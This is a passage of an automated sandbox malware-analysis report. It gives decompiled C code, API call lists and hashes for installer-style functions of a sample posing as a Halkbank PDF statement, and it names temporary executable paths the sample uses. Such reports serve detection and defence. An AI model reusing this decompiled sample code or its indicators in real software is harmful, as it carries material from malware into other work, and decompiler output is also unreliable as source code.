                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                          • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                          • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                          • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                          0x004066a5
                                          0x004066a5
                                          0x004066a5
                                          0x004066ab
                                          0x004066b0
                                          0x004066c1
                                          0x004066c1
                                          0x004066c9
                                          0x004066ca
                                          0x004066cb
                                          0x004066cc
                                          0x004066cf
                                          0x004066d7
                                          0x004066d9
                                          0x004066ea
                                          0x004066ed
                                          0x004066ed
                                          0x004066f1
                                          0x004066f7
                                          0x004066fa
                                          0x004068d5
                                          0x004068d5
                                          0x004068e0
                                          0x004068ec
                                          0x004068ec
                                          0x00000000
                                          0x00406700
                                          0x00406705
                                          0x0040671a
                                          0x0040671b
                                          0x00406721
                                          0x004068b3
                                          0x004068c1
                                          0x004068c4
                                          0x004068c4
                                          0x004068b5
                                          0x004068b8
                                          0x004068bb
                                          0x004068bd
                                          0x004068bd
                                          0x004068c6
                                          0x004068c6
                                          0x004068cc
                                          0x004068cf
                                          0x00406702
                                          0x00000000
                                          0x00406702
                                          0x00000000
                                          0x004068cf
                                          0x00406727
                                          0x0040672a
                                          0x00406739
                                          0x00406740
                                          0x0040674c
                                          0x0040674f
                                          0x00406752
                                          0x00406753
                                          0x00406758
                                          0x0040675e
                                          0x00406761
                                          0x00406764
                                          0x00406857
                                          0x0040685c
                                          0x0040688f
                                          0x00406894
                                          0x00406899
                                          0x0040689e
                                          0x0040689e
                                          0x004068a3
                                          0x004068a9
                                          0x004068ac
                                          0x00000000
                                          0x004068ac
                                          0x0040685e
                                          0x00406861
                                          0x00406864
                                          0x00406879
                                          0x00406880
                                          0x00406866
                                          0x0040686d
                                          0x0040686d
                                          0x00406888
                                          0x0040688b
                                          0x0040684f
                                          0x00406850
                                          0x00406850
                                          0x00000000
                                          0x0040688b
                                          0x00406771
                                          0x00406775
                                          0x00406775
                                          0x00406776
                                          0x00406778
                                          0x004067b5
                                          0x004067b8
                                          0x004067c8
                                          0x004067cb
                                          0x004067d3
                                          0x004067d9
                                          0x004067d9
                                          0x00406834
                                          0x00406834
                                          0x00406836
                                          0x00000000
                                          0x00000000
                                          0x004067dd
                                          0x004067e2
                                          0x004067e3
                                          0x004067e5
                                          0x004067fc
                                          0x0040680a
                                          0x00406810
                                          0x00406812
                                          0x00406830
                                          0x00406830
                                          0x00406830
                                          0x00000000
                                          0x00406830
                                          0x00406818
                                          0x00406821
                                          0x00406824
                                          0x0040682a
                                          0x0040682e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040682e
                                          0x004067f6
                                          0x004067f8
                                          0x004067fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004067fa
                                          0x00000000
                                          0x00406834
                                          0x004067c0
                                          0x00000000
                                          0x0040677a
                                          0x00406798
                                          0x004067a1
                                          0x0040683e
                                          0x00406842
                                          0x0040684a
                                          0x0040684a
                                          0x00000000
                                          0x00406842
                                          0x004067ab
                                          0x00406838
                                          0x0040683c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040683c
                                          0x00406778
                                          0x00000000
                                          0x00406705

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000400), ref: 004067C0
                                          • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                          • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                          • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4260037668-2175014563
                                          • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                          • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                          • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                          • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                          0x004056d0
                                          0x004056da
                                          0x004056df
                                          0x004056e5
                                          0x004056f0
                                          0x004056f3
                                          0x004056f6
                                          0x004056fc
                                          0x004056fc
                                          0x00405702
                                          0x0040570a
                                          0x0040570d
                                          0x0040572a
                                          0x0040572e
                                          0x00405737
                                          0x00405737
                                          0x00405741
                                          0x0040574a
                                          0x00405756
                                          0x0040575d
                                          0x00405761
                                          0x00405764
                                          0x00405777
                                          0x00405785
                                          0x00405785
                                          0x00405789
                                          0x0040578b
                                          0x0040578e
                                          0x00000000
                                          0x0040578e
                                          0x0040570f
                                          0x00405717
                                          0x0040571f
                                          0x00405725
                                          0x00000000
                                          0x00405725
                                          0x0040571f
                                          0x0040570d
                                          0x0040579a

                                          APIs
                                          • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                          • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                          • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                          • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                          • String ID: ('B
                                          • API String ID: 1495540970-2332581011
                                          • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                          • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                          • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                          • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                          0x0040463d
                                          0x004046f3
                                          0x00000000
                                          0x004046f3
                                          0x0040464e
                                          0x00404652
                                          0x00000000
                                          0x0040466c
                                          0x0040466c
                                          0x00404675
                                          0x00000000
                                          0x00000000
                                          0x00404677
                                          0x00404683
                                          0x00404686
                                          0x00404686
                                          0x0040468c
                                          0x00404692
                                          0x00404692
                                          0x0040469e
                                          0x004046a4
                                          0x004046ab
                                          0x004046ae
                                          0x004046b1
                                          0x004046b3
                                          0x004046b3
                                          0x004046bb
                                          0x004046c1
                                          0x004046c1
                                          0x004046cb
                                          0x004046d0
                                          0x004046d3
                                          0x004046d8
                                          0x004046db
                                          0x004046db
                                          0x004046eb
                                          0x004046eb
                                          0x00000000
                                          0x004046ee

                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                          • GetSysColor.USER32(00000000), ref: 00404686
                                          • SetTextColor.GDI32(?,00000000), ref: 00404692
                                          • SetBkMode.GDI32(?,?), ref: 0040469E
                                          • GetSysColor.USER32(?), ref: 004046B1
                                          • SetBkColor.GDI32(?,?), ref: 004046C1
                                          • DeleteObject.GDI32(?), ref: 004046DB
                                          • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                          0x004026ec
                                          0x004026ee
                                          0x004026f1
                                          0x004026f3
                                          0x004026f6
                                          0x004026fb
                                          0x004026ff
                                          0x00402702
                                          0x00402705
                                          0x00402c2a
                                          0x00402c2d
                                          0x0040270b
                                          0x0040270b
                                          0x00402712
                                          0x00402714
                                          0x00402714
                                          0x0040271a
                                          0x0040287e
                                          0x0040287e
                                          0x00402881
                                          0x00402886
                                          0x004015b6
                                          0x0040292e
                                          0x0040292e
                                          0x00000000
                                          0x00402720
                                          0x00402721
                                          0x0040272c
                                          0x0040272f
                                          0x0040273b
                                          0x0040273f
                                          0x004027d7
                                          0x004027ef
                                          0x004027ff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402745
                                          0x00402745
                                          0x00402748
                                          0x00402749
                                          0x0040274c
                                          0x00402751
                                          0x00402758
                                          0x00402760
                                          0x00000000
                                          0x00402766
                                          0x00402766
                                          0x0040276b
                                          0x00000000
                                          0x00402771
                                          0x00402771
                                          0x00402779
                                          0x0040277c
                                          0x0040277f
                                          0x0040283a
                                          0x00402841
                                          0x00402785
                                          0x0040278b
                                          0x00402797
                                          0x00402801
                                          0x00402801
                                          0x00402799
                                          0x00402799
                                          0x0040279c
                                          0x0040279e
                                          0x0040279e
                                          0x0040279e
                                          0x004027a1
                                          0x004027a6
                                          0x004027a9
                                          0x00000000
                                          0x00000000
                                          0x004027ab
                                          0x004027ae
                                          0x004027bc
                                          0x004027c2
                                          0x004027d0
                                          0x00000000
                                          0x004027d2
                                          0x00000000
                                          0x004027d2
                                          0x00000000
                                          0x004027d0
                                          0x0040279e
                                          0x00402804
                                          0x00402807
                                          0x00000000
                                          0x00402809
                                          0x0040280e
                                          0x0040284f
                                          0x00402871
                                          0x00402878
                                          0x0040285d
                                          0x0040285d
                                          0x00402860
                                          0x00402863
                                          0x00402866
                                          0x00402866
                                          0x00000000
                                          0x00402817
                                          0x00402817
                                          0x0040281a
                                          0x0040281d
                                          0x00402823
                                          0x00402827
                                          0x0040282a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040282a
                                          0x0040280e
                                          0x00402807
                                          0x0040277f
                                          0x0040276b
                                          0x00402760
                                          0x00000000
                                          0x0040282c
                                          0x0040282c
                                          0x0040282f
                                          0x00402838
                                          0x00000000
                                          0x0040272f
                                          0x0040271a
                                          0x00402c33
                                          0x00402c39

                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                            • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
